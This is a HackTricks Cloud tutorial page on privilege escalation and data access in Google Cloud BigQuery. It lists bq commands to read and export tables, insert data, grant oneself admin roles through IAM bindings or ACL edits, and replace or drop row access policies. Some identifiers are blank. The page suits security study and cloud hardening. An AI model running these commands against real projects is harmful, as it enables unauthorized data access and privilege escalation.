# GCP - BigQuery Privesc
{% hint style="success" %}
Learn & practice AWS Hacking: (1) (1) (1).png)
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking:  (1).png)
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## BigQuery
For more information about BigQuery check:
{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %}
[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md)
{% endcontent-ref %}
### Read Table
Reading the information stored inside the a BigQuery table it might be possible to find s**ensitive information**. To access the info the permission needed is **`bigquery.tables.get`** , **`bigquery.jobs.create`** and **`bigquery.tables.getData`**:
```bash
bq head .
bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000'
```
### Export data
This is another way to access the data. **Export it to a cloud storage bucket** and the **download the files** with the information.\
To perform this action the following permissions are needed: **`bigquery.tables.export`**, **`bigquery.jobs.create`** and **`storage.objects.create`**.
```bash
bq extract . "gs:///table*.csv"
```
### Insert data
It might be possible to **introduce certain trusted data** in a Bigquery table to abuse a **vulnerability in some other place.** This can be easily done with the permissions **`bigquery.tables.get`** , **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**:
{% code overflow="wrap" %}
```bash
# Via query
bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
# Via insert param
bq insert dataset.table /tmp/mydata.json
```
{% endcode %}
### `bigquery.datasets.setIamPolicy`
An attacker could abuse this privilege to **give himself further permissions** over a BigQuery dataset:
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:' \
--role='roles/bigquery.admin' \
:
# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```
### `bigquery.datasets.update`, (`bigquery.datasets.get`)
Just this permission allows to **update your access over a BigQuery dataset by modifying the ACLs** that indicate who can access it:
```bash
# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson : > acl.json
## Give permissions to the desired user
bq update --source acl.json :
## Read it with
bq head $PROJECT_ID:.
```
### `bigquery.tables.setIamPolicy`
An attacker could abuse this privilege to **give himself further permissions** over a BigQuery table:
```bash
# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:' \
--role='roles/bigquery.admin' \
:.
# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
```
### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`
According to the docs, with the mention permissions it's possible to **update a row policy.**\
However, **using the cli `bq`** you need some more: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.
{% code overflow="wrap" %}
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY ON `..` GRANT TO ("") FILTER USING (term = "Cfba");' # A example filter was used
```
{% endcode %}
It's possible to find the filter ID in the output of the row policies enumeration. Example:
```bash
bq ls --row_access_policies :.
Id Filter Predicate Grantees Creation Time Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter term = "Cfba" user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09
```
If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy:
{% code overflow="wrap" %}
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY ON `..`;'
# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `..`;'
```
{% endcode %}
{% hint style="danger" %}
Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However this is prevented by bigquery.
{% endhint %}
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}